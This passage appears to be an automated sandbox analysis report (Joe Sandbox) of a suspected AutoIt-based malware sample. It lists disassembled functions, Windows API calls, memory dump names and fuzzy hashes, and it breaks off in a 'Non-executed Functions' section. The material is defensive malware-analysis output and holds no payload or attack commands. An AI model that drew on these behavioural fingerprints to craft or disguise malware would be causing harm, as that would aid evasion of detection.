                      Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
                      • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                      • Opcode Fuzzy Hash: d182fd2a8941a7cd94101b3a2aa97755fded6afb6422dcc5fd8f0978a5f28f82
                      • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                      Function 004059B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 9edd7166449ee7880cecad104d70ab7bad2cead84978e4cb634d2adfce49154d
                      • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                      • Opcode Fuzzy Hash: 9edd7166449ee7880cecad104d70ab7bad2cead84978e4cb634d2adfce49154d
                      • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                      Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                        • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                        • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                        • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Library$Free$Load__wfsopen_memmove
                      • String ID:
                      • API String ID: 1396898556-0
                      • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                      • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                      • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                      • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                      Function 00407F77 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: f93565b5a1050caf9e0cd63f56fa626170f343c5ddf80ca700b6859ac2ed55ae
                      • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                      • Opcode Fuzzy Hash: f93565b5a1050caf9e0cd63f56fa626170f343c5ddf80ca700b6859ac2ed55ae
                      • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                      Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
                      • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                      • Opcode Fuzzy Hash: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
                      • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                      Function 00405BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                      Download Yara Rule
                      APIs
                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                      • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                      • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                      • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                      Function 00405A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 1ad26d4457b191b8deda74aaccd83d0fad23f88d9d00bf4793357419d9a45ef1
                      • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                      • Opcode Fuzzy Hash: 1ad26d4457b191b8deda74aaccd83d0fad23f88d9d00bf4793357419d9a45ef1
                      • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                      Function 02F56086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: 91145e022c4d89f4ff38977bcf3824bf8ce2fc8d6f493ee1f87cd9a17569864f
                      • Instruction ID: 471502cfade07fd2614933ff6b9e063a8aa8fd7d98164f54dbe45aa12473a22e
                      • Opcode Fuzzy Hash: 91145e022c4d89f4ff38977bcf3824bf8ce2fc8d6f493ee1f87cd9a17569864f
                      • Instruction Fuzzy Hash: 5D019671D0D3709ED7258B2484143357BF8AF46AD4F89868AEFA5DB1A3D7308504CB52
                      Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                      • __lock_file.LIBCMT ref: 004248A6
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2597487223-0
                      • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                      • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                      • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                      • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                      Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                      • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                      • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                      • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                      Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      APIs
                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LongNamePath_memmove
                      • String ID:
                      • API String ID: 2514874351-0
                      • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                      • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                      • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                      • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                      Function 00468E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __fread_nolock
                      • String ID:
                      • API String ID: 2638373210-0
                      • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                      • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                      • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                      • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                      Function 00405C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                      Download Yara Rule
                      APIs
                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                      • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                      • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                      • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                      Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __wfsopen
                      • String ID:
                      • API String ID: 197181222-0
                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                      Function 00441DE4 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 00441DF0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: PathTemp
                      • String ID:
                      • API String ID: 2920410445-0
                      • Opcode ID: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
                      • Instruction ID: cdab6d828b25e7ec8576945e7c24180a122b150f18df0bf6d50e7f80ea2f144b
                      • Opcode Fuzzy Hash: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
                      • Instruction Fuzzy Hash: C7C04C715500199BD715A754DC95AA8767CAB10705F4040EAB105D105196745B85CF29
                      Function 0046D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast
                      • String ID:
                      • API String ID: 1452528299-0
                      • Opcode ID: 5be04f1f0bd7b4059a559d413f4d22db7d19625b3a90924b2a9bc5188c209b6e
                      • Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
                      • Opcode Fuzzy Hash: 5be04f1f0bd7b4059a559d413f4d22db7d19625b3a90924b2a9bc5188c209b6e
                      • Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                      Function 00BA4288 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: a9bc594261e2ad799311a4085c40e9b101872f21d4e87998302a72a31f0f62a1
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: 83E0E67494420DDFDB00DFB4D54969D7BF4EF04301F1001A5FD01D2280D7709D508A62

                      Non-executed Functions

                      Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                      • SendMessageW.USER32 ref: 0048CC29
                      • _wcsncpy.LIBCMT ref: 0048CC95
                      • GetKeyState.USER32(00000011), ref: 0048CCB6
                      • GetKeyState.USER32(00000009), ref: 0048CCC3
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                      • GetKeyState.USER32(00000010), ref: 0048CCE3
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                      • SendMessageW.USER32 ref: 0048CD33
                      • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                      • SetCapture.USER32(?), ref: 0048CE69
                      • ClientToScreen.USER32(?,?), ref: 0048CECE
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
